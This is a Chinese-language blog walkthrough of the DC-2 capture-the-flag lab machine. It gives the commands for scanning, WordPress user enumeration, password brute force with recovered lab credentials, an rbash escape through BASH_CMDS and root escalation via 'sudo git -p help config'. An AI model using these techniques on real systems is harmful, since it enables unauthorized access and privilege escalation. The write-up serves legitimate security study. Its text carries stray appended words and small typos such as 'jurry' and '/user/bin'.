DC-2靶机的渗透学习

2022年01月14日 阅读数:3
这篇文章主要向大家介绍DC-2靶机的渗透学习,主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。

1、靶机的环境搭配

 

攻击机(KALI):192.168.226.129php

靶机(DC-1):  192.168.226.132(未知)git

靶机地址:http://www.five86.com/downloads/DC-2.zipshell

2、战前准备

2.1 IP地址确认

命令:arp-scan -l 扫描局域网全部设备(全部设备IP、MAC地址、制造商信息)数据库

arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(能够发现本地网络中的隐藏设备)它能够构造并发送ARP请求到指定的IP地址
而且显示返回的全部响应。
arp-scan 能够显示本地网络中的全部链接设备,即便这些设备有防火墙。防火墙设备能够屏蔽ping,可是并不能屏蔽ARP数据包。

扫描到目标靶机IP地址 192.168.226.132vim

2.2 端口扫描

nmap -T4 -sV -O -A -p- 192.168.226.132
 -T4(速度) -sV(版本扫描和开启的服务) -O(操做系统) -p-(所有端口)

# nmap -T4 -sV -O -A -p- 192.168.226.132
安全

靶机开放了http服务和ssh服务,并且将22号默认端口改成7744ruby

2.3 网站扫描

使用 dirb http://192.168.226.132寻找登陆界面bash

 得到注入点http://dc-2/wp-login.php?redirect_to=http%3A%2F%2F192.168.226.132%2Fwp-admin%2F&reauth=1网络

2.4 访问网页获取信息

咱们发现打不开,估计DNS解析错误并发

去修改hosts文件

vim /etc/hosts
cat /etc/hosts

             成功!!!    

2.5 查看网站结构

咱们看到CMS是wordpress,数据库是MYSQL,wordpress是一种使用PHP语言和MySQL数据库开发的博客平台

三大PHP CMS网站:Drupal、 Wordpress、Joomla

3、渗透开始

1 flag1

点击Flag获得Flag1,提示咱们使用 cewl

 最后一段是告诉你可能会不断来回切换用户

2 flag2

2.1 使用cewl生成密码

cewl -w DC2_passwords.txt http://dc-2
-w,/–write:将输出结果写入到文件

cewl,是一个kali自带的密码生成工具,它是一个ruby应用,爬行指定url的指定深度。也能够跟一个外部连接,结果会返回一个单词列表,这个列表能够扔到John the ripper工具里进行密码破解。cewl还有一个相关的命令行工具应用FAB,它使用相同的元数据提取技术从已下载的列表中建立做者/建立者列表
 

 

2.2使用wpscan扫出用户 

wpscan --url http://dc-2 --enumerate u
#暴力枚举用户名

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,可以扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress自己的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,而且支持最新版本的WordPress、值得注意的是,它不只可以扫描相似robots.txt这样的敏感文件,并且还可以检测当前已启用的插件和其余功能
 

2.3找到3个用户admin、jerry、tom,并将他们放入一个文本文件中

2.4 开始爆破

wpscan --url  http://DC-2 -U dc2_username.txt -P DC2_passwords.txt

用户名:jerry 密码:adipiscing
用户名:tom 密码:parturient

2.5登陆后台网页

咱们使用Jerry找到了flag2,可是tom用户登陆不行

 

提示咱们使用ssh服务登陆

3 flag3

3.1 ssh登陆

尝试后发现jerry不可登陆,可是tom能够成功登陆

ssh tom@192.168.226.132 -p 7744
# 默认链接22端口,可是这里由于它更改了ssh的默认端口,更改为了7744端口,因此须要使用 -p 指定7744端口

 

3.2 初步查找文件

tom@DC-2:~$ ls
tom@DC-2:~$ cat flag3.txt
tom@DC-2:~$ ls -al usr/bin   #查看限制能使用哪些命令,发现能用vi读取
tom@DC-2:~$ vi flag3.txt

 咱们发现使用cat命令的时候提示,tom用户使用的-rbash(权限限制的shell),所以须要换一个更大的权限。

 3.3 提权

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/  设置环境变量
tom@DC-2:~$ export PATH=$PATH:/user/bin  设置环境变量

4 flag4

切换用户

su jurry
adipiscing
cd /home/jerry
ls
cat flag4.txt

 

5 flag5

5.1 切换用户

sudo -l 

发现git具备root权限且不须要密码

 5.2 git提权

sudo git -p help config
!/bin/bash

 

5个flag成功找到

总计:find提权和git提权不熟练

上一篇: bash脚本使用
下一篇: SIP异常信令学习